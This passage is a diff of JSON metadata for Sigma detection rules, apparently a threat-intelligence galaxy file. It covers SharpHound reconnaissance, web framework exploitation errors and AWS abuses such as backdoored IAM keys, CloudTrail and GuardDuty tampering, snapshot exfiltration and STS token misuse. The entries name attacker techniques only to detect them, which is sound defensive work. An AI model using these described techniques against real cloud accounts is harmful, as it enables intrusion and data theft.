remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", + "value": "SharpHound Recon Sessions", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" + ], + "tags": [ + "attack.t1033" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_sharphound_recon_sessions.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", + "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", + "value": "Ruby on Rails Framework Exceptions", + "meta": { + "refs": [ + "http://edgeguides.rubyonrails.org/security.html", + "http://guides.rubyonrails.org/action_controller_overview.html", + "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/08/06", + "filename": "appframework_ruby_on_rails_exceptions.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "ruby_on_rails" + } + }, + { + "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", + "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", + "value": "Spring Framework Exceptions", + "meta": { + "refs": [ + "https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": 
"2017/08/06", + "filename": "appframework_spring_exceptions.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "spring" + } + }, + { + "description": "Detects SQL error messages that indicate probing for an injection attack", + "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", + "value": "Suspicious SQL Error Messages", + "meta": { + "refs": [ + "http://www.sqlinjection.net/errors", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/11/27", + "filename": "app_sqlinjection_errors.yml", + "author": "Bjoern Kimminich", + "level": "high", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "sql" + } + }, + { + "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", + "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", + "value": "AWS Attached Malicious Lambda Layer", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2021/09/23", + "filename": "aws_attached_malicious_lambda_layer.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Lambda Layer being attached may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects disabling, deleting and updating of a Trail", + "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", + "value": "AWS CloudTrail Important Change", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/01/21", + "filename": "aws_cloudtrail_disable_logging.yml", + "author": "vitaliy0x1", + "level": "medium", + "falsepositive": [ + "Valid change in a Trail" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects AWS Config Service disabling", + "uuid": "07330162-dba1-4746-8121-a9647d49d297", + "value": "AWS Config Disabling Channel/Recorder", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/01/21", + "filename": "aws_config_disable_recording.yml", + "author": "vitaliy0x1", + "level": "high", + "falsepositive": [ + "Valid change in AWS Config Service" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n", + "uuid": 
"16124c2d-e40b-4fcc-8f2c-5ab7870a2223", + "value": "AWS EC2 Disable EBS Encryption", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486", + "attack.t1565" + ], + "creation_date": "2021/06/29", + "filename": "aws_ec2_disable_encryption.yml", + "author": "Sittikorn S", + "level": "medium", + "falsepositive": [ + "System Administrator Activities", + "DEV, UAT, SAT environment. You should apply this rule with PROD account only." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.", + "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", + "value": "AWS EC2 Download Userdata", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "creation_date": "2020/02/11", + "filename": "aws_ec2_download_userdata.yml", + "author": "faloker", + "level": "medium", + "falsepositive": [ + "Assets management software like device42" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects changes to the EC2 instance startup script. 
The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", + "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", + "value": "AWS EC2 Startup Shell Script Change", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.004" + ], + "creation_date": "2020/02/12", + "filename": "aws_ec2_startup_script_change.yml", + "author": "faloker", + "level": "high", + "falsepositive": [ + "Valid changes to the startup script" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", + "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", + "value": "AWS EC2 VM Export Failure", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005", + "attack.exfiltration", + "attack.t1537" + ], + "creation_date": "2020/04/16", + "filename": "aws_ec2_vm_export_failure.yml", + "author": "Diogo Braz", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a 
lab environment.\n", + "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", + "value": "AWS ECS Backdoor Task Definition", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", + "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", + "https://attack.mitre.org/techniques/T1525", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1525" + ], + "creation_date": "2022/06/07", + "filename": "aws_ecs_task_definition_backdoor.yml", + "author": "Darin Smith", + "level": "medium", + "falsepositive": [ + "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n", + "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", + "value": "AWS EFS Fileshare Modified or Deleted", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/15", + "filename": "aws_efs_fileshare_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a EFS Fileshare Mount is modified or deleted. 
An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", + "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", + "value": "AWS EFS Fileshare Mount Modified or Deleted", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/08/15", + "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies when an EKS cluster is created or deleted.", + "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", + "value": "AWS EKS Cluster Created or Deleted", + "meta": { + "refs": [ + "https://any-api.com/amazonaws_com/eks/docs/API_Description", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/08/16", + "filename": "aws_eks_cluster_created_or_deleted.yml", + "author": "Austin Songer", + "level": "low", + "falsepositive": [ + "EKS Cluster being created or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when an ElastiCache security group has been created.", + "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", + "value": "AWS ElastiCache Security Group Created", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136", + "attack.t1136.003" + ], + "creation_date": "2021/07/24", + "filename": "aws_elasticache_security_group_created.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies when an ElastiCache security group has been modified or deleted.", + "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", + "value": "AWS ElastiCache Security Group Modified or Deleted", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ], + "creation_date": "2021/07/24", + "filename": "aws_elasticache_security_group_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.", + "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", + "value": "Account Enumeration on AWS", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1592" + ], + "creation_date": "2020/11/21", + "filename": "aws_enum_listing.yml", + "author": "toffeebr33k", + "level": "low", + "falsepositive": [ + "AWS Config or other configuration scanning activities" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", + "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", + "value": "AWS GuardDuty Important Change", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/02/11", + "filename": "aws_guardduty_disruption.yml", + "author": "faloker", + "level": "high", + "falsepositive": [ + "Valid change in the GuardDuty (e.g. 
to ignore internal scanners)" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", + "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", + "value": "AWS IAM Backdoor Users Keys", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2020/02/12", + "filename": "aws_iam_backdoor_users_keys.yml", + "author": "faloker", + "level": "medium", + "falsepositive": [ + "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", + "AWS API keys legitimate exchange workflows" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when an user creates or invokes a lambda function.", + "uuid": "d914951b-52c8-485f-875e-86abab710c0b", + "value": "AWS Lambda Function Created or Invoked", + "meta": { + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2021/10/03", + "filename": "aws_lambda_function_created_or_invoked.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Lambda Function created or invoked may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects evade to Macie detection.", + "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221", + "value": "AWS Macie Evasion", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/macie/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/06", + "filename": "aws_macic_evasion.yml", + "author": "Sittikorn S", + "level": "medium", + "falsepositive": [ + "System or Network administrator behaviors" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects possible suspicious glue development endpoint activity.", + "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", + "value": "AWS Glue Development Endpoint Activity", + "meta": { + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2021/10/03", + "filename": "aws_passed_role_to_glue_development_endpoint.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects the change of database master password. It may be a part of data exfiltration.", + "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", + "value": "AWS RDS Master Password Change", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "creation_date": "2020/02/12", + "filename": "aws_rds_change_master_password.yml", + "author": "faloker", + "level": "medium", + "falsepositive": [ + "Benign changes to a db instance" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.", + "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", + "value": "Restore Public AWS RDS Instance", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "creation_date": "2020/02/12", + "filename": "aws_rds_public_db_restore.yml", + "author": "faloker", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects AWS root account usage", + "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", + "value": "AWS Root Credentials", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078.004" + ], + "creation_date": "2020/01/21", + "filename": "aws_root_account_usage.yml", + "author": "vitaliy0x1", + "level": "medium", + "falsepositive": [ + "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", + "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", + "value": "AWS Route 53 Domain Transfer Lock Disabled", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ], + "creation_date": "2021/07/22", + "filename": "aws_route_53_domain_transferred_lock_disabled.yml", + "author": "Elastic, Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", + "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", + "value": "AWS Route 53 Domain Transferred to Another Account", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ], + "creation_date": "2021/07/22", + "filename": "aws_route_53_domain_transferred_to_another_account.yml", + "author": "Elastic, Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", + "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", + "value": "AWS S3 Data Management Tampering", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/pull/1145/files", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ], + "creation_date": "2021/07/24", + "filename": "aws_s3_data_management_tampering.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects the modification of the findings on SecurityHub.", + "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", + "value": "AWS SecurityHub Findings Evasion", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2021/06/28", + "filename": "aws_securityhub_finding_evasion.yml", + "author": "Sittikorn S", + "level": "high", + "falsepositive": [ + "System or Network administrator behaviors", + "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", + "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", + "value": "AWS Snapshot Backup Exfiltration", + "meta": { + "refs": [ + "https://www.justice.gov/file/1080281/download", + "https://attack.mitre.org/techniques/T1537/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ], + "creation_date": "2021/05/17", + "filename": "aws_snapshot_backup_exfiltration.yml", + "author": "Darin Smith", + "level": "medium", + "falsepositive": [ + "Valid change to a snapshot's permissions" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies the suspicious use of AssumeRole. 
Attackers could move laterally and escalate privileges.", + "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", + "value": "AWS STS AssumeRole Misuse", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/pull/1214", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ], + "creation_date": "2021/07/24", + "filename": "aws_sts_assumerole_misuse.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", + "Automated processes that uses Terraform may lead to false positives." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies the suspicious use of GetSessionToken. 
Tokens could be created and used by attackers to move laterally and escalate privileges.", + "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", + "value": "AWS STS GetSessionToken Misuse", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/pull/1213", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ], + "creation_date": "2021/07/24", + "filename": "aws_sts_getsessiontoken_misuse.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "Identifies when suspicious SAML activity has occurred in AWS. 
An adversary could gain backdoor access via SAML.", + "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", + "value": "AWS Suspicious SAML Activity", + "meta": { + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078", + "attack.lateral_movement", + "attack.t1548", + "attack.privilege_escalation", + "attack.t1550", + "attack.t1550.001" + ], + "creation_date": "2021/09/22", + "filename": "aws_susp_saml_activity.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Automated processes that uses Terraform may lead to false positives.", + "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
